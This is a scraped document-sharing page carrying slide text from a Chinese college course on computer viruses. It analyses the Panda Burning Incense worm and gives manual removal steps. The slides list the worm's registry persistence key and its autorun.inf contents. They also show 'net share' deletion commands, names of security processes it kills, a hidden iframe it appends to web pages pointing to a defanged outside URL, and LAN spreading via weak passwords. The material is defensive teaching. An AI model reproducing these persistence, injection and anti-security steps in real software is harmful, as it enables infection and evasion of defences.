- 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
- 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
计算机病毒与防治 教学单元4-4 蠕虫病毒防治 熊猫烧香病毒特点 熊猫烧香病毒特点 熊猫烧香病毒特点 熊猫烧香病毒特点 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒主要行为分析 熊猫烧香病毒主要行为分析 熊猫烧香病毒主要行为分析 熊猫烧香病毒主要行为分析 熊猫烧香病毒主要行为分析 熊猫烧香病毒主要行为分析 熊猫烧香病毒主要行为分析 熊猫烧香病毒主要行为分析 熊猫烧香病毒手工清除 熊猫烧香病毒手工清除 本讲小结 计算机病毒与防治课程小组 (3)创建启动项: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] svcshare=%System%\drivers\spoclsv.exe 熊猫烧香在注册表中添加启动项 计算机病毒与防治课程小组 (4)在各分区根目录生成病毒副本: X:\setup.exe X:\autorun.inf 其中autorun.inf中的内容是: [AutoRun] OPEN=setup.exe shellexecute=setup.exe shell\Auto\command=setup.exe 计算机病毒与防治课程小组 (5)使用net share命令关闭管理共享: cmd.exe /c net share X$ /del /y cmd.exe /c net share admin$ /del /y (6)修改“显示所有文件和文件夹”设置: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL] CheckedValue=dword(7)尝试关闭安全软件相关窗口: 天网防火墙进程、VirusScan 、NOD32等 (8)尝试结束安全软件相关进程: Mcshield.exe VsTskMgr.exe等 计算机病毒与防治课程小组 (9)禁用安全软件相关服务: Schedule sharedaccess RsCCenter 等 (10)删除安全软件相关启动项: SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RavTask SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KvMonXP (11)遍历目录修改htm/html/asp/php/jsp/aspx等网页文件,在这些文件尾部追加信息: iframe src=hxxp:///wuhan/down.htm width=0 height=0 frameborder=0 /iframe (12)在访问过的目录下生成Desktop_.ini文件,内容为当前日期。 (13)此外,病毒还会尝试删除GHO文件。 计算机病毒与防治课程小组 病毒还尝试使用弱密码将副本以GameSetup.exe的文件名复制到局域网内其它计算机中。 弱密码文件 计算机病毒与防治课程小组 (1)结束病毒进程: %System%\drivers\spoclsv.exe 查看当前运行spoclsv.exe的路径 (2)删除病毒文件: %System%\drivers\spoclsv.exe 不同的spoclsv.exe变种,此目录可不同。有的病毒变种可能在以下目录中:C:\WINDOWS\System32\Drivers\spoclsv.exe。 (3)删除病毒启动项: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] svcshare=%System%\drivers\spoclsv.exe * Virus 重庆电子工程职业学院 计算机病毒与防治课程小组 熊猫烧香病毒源码分析 熊猫烧香病毒特点 熊猫烧香病毒行为分析 第二讲 熊猫烧香蠕虫病毒剖析 计算机病毒与防治课程小组 熊猫
您可能关注的文档
最近下载
- 论文ICU口腔感染的预防护理.doc VIP
- 非标自动化电气设计作业流程与标准规范统一标准详.doc VIP
- 胰腺炎胃肠减压的护理.pptx VIP
- 2025至2030年中国成人高等教育市场运行态势及行业发展前景预测报告.docx
- 完整版中级财务会计试题及答案.docx VIP
- (NEW)中山大学中国语言文学系612语言学概论历年考研真题及详解.docx VIP
- 3L.05.01 ×× U9 ERP项目-项目上线总结报告.docx VIP
- 户外运动伤害保险服务分析方案.docx VIP
- 南京市鼓楼区2024~2025学年九年级(上)期末考试物理试卷及答案.pdf VIP
- 2025年护士长年终工作总结PPT课件.pptx VIP
原创力文档


文档评论(0)